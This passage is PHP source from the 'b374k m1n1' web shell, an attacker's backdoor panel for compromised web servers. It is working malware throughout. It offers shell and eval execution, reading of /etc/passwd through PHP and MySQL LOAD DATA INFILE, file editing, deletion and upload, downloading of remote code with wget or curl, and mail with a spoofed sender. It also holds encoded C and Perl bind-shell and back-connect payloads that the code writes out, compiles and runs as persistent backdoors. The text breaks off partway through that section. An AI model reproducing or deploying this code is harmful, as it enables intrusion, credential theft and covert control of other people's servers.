$buff .= "</table>"; return $buff; } function ukuran($file){ if($size = @filesize($file)){ if($size <= 1024) return $size; else{ if($size <= 1024*1024) { $size = @round($size / 1024,2);; return "$size kb"; } else { $size = @round($size / 1024 / 1024,2); return "$size mb"; } } } else return "???"; } function exe($cmd){ if(function_exists(\'system\')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists(\'exec\')) { @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff; } elseif(function_exists(\'passthru\')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists(\'shell_exec\')){ $buff = @shell_exec($cmd); return $buff; } } function tulis($file,$text){ $textz = gzinflate(base64_decode($text)); if($filez = @fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } } function ambil($link,$file) { if($fp = @fopen($link,"r")){ while(!feof($fp)) { $cont.= @fread($fp,1024); } @fclose($fp); $fp2 = @fopen($file,"w"); @fwrite($fp2,$cont); @fclose($fp2); } } function which($pr){ $path = exe("which $pr"); if(!empty($path)) { return trim($path); } else { return trim($pr); } } function download($cmd,$url){ $namafile = basename($url); switch($cmd) { case \'wwget\': exe(which(\'wget\')." ".$url." -O ".$namafile);break; case \'wlynx\': exe(which(\'lynx\')." -source ".$url." > ".$namafile);break; case \'wfread\' : ambil($wurl,$namafile);break; case \'wfetch\' : exe(which(\'fetch\')." -o ".$namafile." -p ".$url);break; case \'wlinks\' : exe(which(\'links\')." -source ".$url." > ".$namafile);break; case \'wget\' : exe(which(\'GET\')." ".$url." > ".$namafile);break; case \'wcurl\' : exe(which(\'curl\')." ".$url." -o ".$namafile);break; default: break; } return $namafile; } function get_perms($file) { if($mode=@fileperms($file)){ $perms=\'\'; $perms .= ($mode & 00400) ? \'r\' : \'-\'; $perms .= ($mode & 00200) ? \'w\' : \'-\'; $perms .= ($mode & 00100) ? \'x\' : \'-\'; $perms .= ($mode & 00040) ? \'r\' : \'-\'; $perms .= ($mode & 00020) ? \'w\' : \'-\'; $perms .= ($mode & 00010) ? \'x\' : \'-\'; $perms .= ($mode & 00004) ? \'r\' : \'-\'; $perms .= ($mode & 00002) ? \'w\' : \'-\'; $perms .= ($mode & 00001) ? \'x\' : \'-\'; return $perms; } else return "??????????"; } function clearspace($text){ return str_replace(" ","_",$text); } $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"; $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; ?> <html><head><title>:: b374k m1n1 <?php echo $ver; ?> ::</title> <script type="text/javascript"> function tukar(lama,baru){ document.getElementById(lama).style.display = \'none\'; document.getElementById(baru).style.display = \'block\'; } </script> <style type="text/css"> body{ background:#000000;; } a { text-decoration:none; } a:hover{ border-bottom:1px solid #4C83AF; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; } #menu{ background:#111111; margin:8px 2px 4px 2px; } #menu a{ padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; } #menu a:hover{ background:#191919; border-bottom:1px solid #333333; border-top:1px solid #333333; } .tabnet{ margin:15px auto 0 auto; border: 1px solid #333333; } .main { width:100%; } .gaya { color: #4C83AF; } .inputz{ background:#111111; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; } .inputzbut{ background:#111111; color:#4C83AF; margin:0 4px; border:1px solid #444444; } .inputz:hover, .inputzbut:hover{ border-bottom:1px solid #4C83AF; border-top:1px solid #4C83AF; } .output { margin:auto; border:1px solid #4C83AF; width:100%; height:400px; background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ padding: 0 4px; } .b1{ font-size:30px; padding:0; color:#444444; } .b2{ font-size:30px; padding:0; color: #333333; } .b_tbl{ text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#cccccc; padding:6px 8px;; } .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; } .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px; line-height:24px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #4C83AF; } .explore tr:hover{ background:#111111; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{ display:none; padding:0;margin:0; } </style> </head> <body onLoad="document.getElementById(\'cmd\').focus();"> <div class="main"> <!-- head info start here --> <div class="head_info"> <table><tr> <td><table class="b_tbl"><tr><td><a href="?"><span class="b1">b<span class="b2">374</span>k</span></a></td></tr><tr><td>m1n1 <?php echo $ver; ?></td></tr></table></td> <td><?php echo $buff; ?></td> </tr></table> </div> <!-- head info end here --> <!-- menu start --> <div id="menu"> <a href="?<?php echo "y=".$pwd; ?>">explore</a> <a href="?<?php echo "y=".$pwd; ?>&x=shell">shell</a> <a href="?<?php echo "y=".$pwd; ?>&x=php">eval</a> <a href="?<?php echo "y=".$pwd; ?>&x=mysql">mysql</a> <a href="?<?php echo "y=".$pwd; ?>&x=phpinfo">phpinfo</a> <a href="?<?php echo "y=".$pwd; ?>&x=netsploit">netsploit</a> <a href="?<?php echo "y=".$pwd; ?>&x=upload">upload</a> <a href="?<?php echo "y=".$pwd; ?>&x=mail">mail</a> </div> <!-- menu end --> <?php if(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'php\')){ ?> <form action="?y=<?php echo $pwd; ?>&x=php" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST[\'submitcmd\'])) { echo eval(magicboom($_POST[\'cmd\'])); } else echo "echo file_get_contents(\'/etc/passwd\');"; ?> </textarea> <tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'mysql\')){ if(isset($_GET[\'sqlhost\']) && isset($_GET[\'sqluser\']) && isset($_GET[\'sqlpass\']) && isset($_GET[\'sqlport\'])){ $sqlhost = $_GET[\'sqlhost\']; $sqluser = $_GET[\'sqluser\']; $sqlpass = $_GET[\'sqlpass\']; $sqlport = $_GET[\'sqlport\']; if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\\"width:99%;padding:4px 10px 0 10px;\\">"; $msg .= "<p>Connected to ".$sqluser."<span class=\\"gaya\\">@</span>".$sqlhost.":".$sqlport; $msg .= " <span class=\\"gaya\\">-></span> <a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&\\">[ databases ]</a>"; if(isset($_GET[\'db\'])) $msg .= " <span class=\\"gaya\\">-></span> <a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET[\'db\']."\\">".htmlspecialchars($_GET[\'db\'])."</a>"; if(isset($_GET[\'table\'])) $msg .= " <span class=\\"gaya\\">-></span> <a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET[\'db\']."&table=".$_GET[\'table\']."\\">".htmlspecialchars($_GET[\'table\'])."</a>"; $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>"; $msg .= "</div>"; echo $msg; if(isset($_GET[\'db\']) && (!isset($_GET[\'table\'])) && (!isset($_GET[\'sqlquery\']))){ $db = $_GET[\'db\']; $query = "DROP TABLE IF EXISTS b374k_table;\\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\\nLOAD DATA INFILE \\"/etc/passwd\\"\\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\\nDROP TABLE IF EXISTS b374k_table;"; $msg = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">$query</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; $tables = array(); $msg .= "<table class=\\"explore\\" style=\\"width:99%;\\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables); foreach($tables as $table){ $msg .= "<tr><td><a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."\\">$table</a></td></tr>"; } $msg .= "</table>"; } elseif(isset($_GET[\'table\']) && (!isset($_GET[\'sqlquery\']))){ $db = $_GET[\'db\']; $table = $_GET[\'table\']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <input type=\\"hidden\\" name=\\"table\\" value=\\"".$table."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">".$query."</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; $columns = array(); $msg = "<table class=\\"explore\\" style=\\"width:99%;\\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET[\'z\'])) $page = (int) $_GET[\'z\']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){ if(trim($data) == "") $data = " "; $msg .= "<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\\"padding:10px 0 0 6px;\\"> <form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <input type=\\"hidden\\" name=\\"table\\" value=\\"".$table."\\" /> Page <select class=\\"inputz\\" name=\\"z\\" onchange=\\"this.form.submit();\\">"; for($i = 1;$i <= $totpage;$i++){ $head .= "<option value=\\"".$i."\\">".$i."</option>"; if($i == $_GET[\'z\']) $head .= "<option value=\\"".$i."\\" selected=\\"selected\\">".$i."</option>"; } $head .= "</select><noscript><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET[\'submitquery\']) && ($_GET[\'sqlquery\'] != "")){ $db = $_GET[\'db\']; $query = magicboom($_GET[\'sqlquery\']); $msg = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">".$query."</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){ if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; <span class=\\"gaya\\">[</span> ok <span class=\\"gaya\\">]</span></p>"; $msg .= "<table class=\\"explore\\" style=\\"width:99%;\\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; <span class=\\"gaya\\">[</span> error <span class=\\"gaya\\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;\\nSHOW VARIABLES;\\nSHOW STATUS;"; $msg = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">".$query."</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\\"explore\\" style=\\"width:99%;\\"><tr><th>available databases</th></tr>"; $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."\\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\\"text-align:center;\\">cant connect to mysql server</p>"; echo $msg; } else{ ?> <form action="?" method="get"> <input type="hidden" name="y" value="<?php echo $pwd; ?>" /> <input type="hidden" name="x" value="mysql" /> <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr> <tr><td> Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td> Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td> Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td> Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form> <?php }} elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'mail\')){ if(isset($_POST[\'mail_send\'])){ $mail_to = $_POST[\'mail_to\']; $mail_from = $_POST[\'mail_from\']; $mail_subject = $_POST[\'mail_subject\']; $mail_content = magicboom($_POST[\'mail_content\']); if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){ $msg = "email sent to $mail_to"; } else $msg = "send email failed"; } ?> <form action="?y=<?php echo $pwd; ?>&x=mail" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me ASAP ;-p</textarea> <tr><td> <input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" /> mail to</td></tr> <tr><td> <input class="inputz" style="width:20%;" type="text" value="b374k@fbi.gov" name="mail_from" /> from</td></tr> <tr><td> <input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" /> subject</td></tr> <tr><td> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form> <tr><td> <?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'phpinfo\')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\\"phpinfo\\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET[\'view\']) && ($_GET[\'view\'] != "")){ if(is_file($_GET[\'view\'])){ if(!isset($file)) $file = magicboom($_GET[\'view\']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\\"margin:6px 0 0 2px;line-height:20px;\\"> <tr><td>Filename</td><td><span id=\\"".clearspace($filn)."_link\\">".$file."</span> <form action=\\"?y=".$pwd."&view=$file\\" method=\\"post\\" id=\\"".clearspace($filn)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$filn."\\" style=\\"margin:0;padding:0;\\" /> <input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$filn."\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($filn)."_link\',\'".clearspace($filn)."_form\');\\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\\"?y=$pwd&edit=$file\\">edit</a> | <a href=\\"javascript:tukar(\'".clearspace($filn)."_link\',\'".clearspace($filn)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&delete=$file\\">delete</a> | <a href=\\"?y=$pwd&dl=$file\\">download</a> (<a href=\\"?y=$pwd&dlgzip=$file\\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\\"?y=".$pwd."&view=".$file."\\">text</a> | <a href=\\"?y=".$pwd."&view=".$file."&type=code\\">code</a> | <a href=\\"?y=".$pwd."&view=".$file."&type=image\\">image</a></td></tr> </table> "; if(isset($_GET[\'type\']) && ($_GET[\'type\']==\'image\')){ echo "<div style=\\"text-align:center;margin:8px;\\"><img src=\\"?y=".$pwd."&img=".$filn."\\"></div>"; } elseif(isset($_GET[\'type\']) && ($_GET[\'type\']==\'code\')){ echo "<div class=\\"viewfile\\">"; $file = wordwrap(@file_get_contents($file),"240","\\n"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\\"viewfile\\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET[\'view\'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET[\'edit\']) && ($_GET[\'edit\'] != "")){ if(isset($_POST[\'save\'])){ $file = $_POST[\'saveas\']; $content = magicboom($_POST[\'content\']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time()); if(@fwrite($filez,$content)) $msg = "file saved <span class=\\"gaya\\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET[\'edit\']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("\'\'","\'",fgets($filez))); } @fclose($filez); } ?> <form action="?y=<?php echo $pwd; ?>&edit=<?php echo $file; ?>" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content"> <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> <?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'upload\')){ if(isset($_POST[\'uploadcomp\'])){ if(is_uploaded_file($_FILES[\'file\'][\'tmp_name\'])){ $path = magicboom($_POST[\'path\']); $fname = $_FILES[\'file\'][\'name\']; $tmp_name = $_FILES[\'file\'][\'tmp_name\']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST[\'uploadurl\'])){ $pilihan = trim($_POST[\'pilihan\']); $wurl = trim($_POST[\'wurl\']); $path = magicboom($_POST[\'path\']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?> <form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post"> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr> <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload"> <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'netsploit\')){ if (isset($_POST[\'bind\']) && !empty($_POST[\'port\']) && !empty($_POST[\'bind_pass\']) && ($_POST[\'use\'] == \'C\')) { $port = trim($_POST[\'port\']); $passwrd = trim($_POST[\'bind_pass\']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST[\'bind\']) && !empty($_POST[\'port\']) && !empty($_POST[\'bind_pass\']) && ($_POST[\'use\'] == \'Perl\')) { $port = trim($_POST[\'port\']); $passwrd = trim($_POST[\'bind_pass\']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); 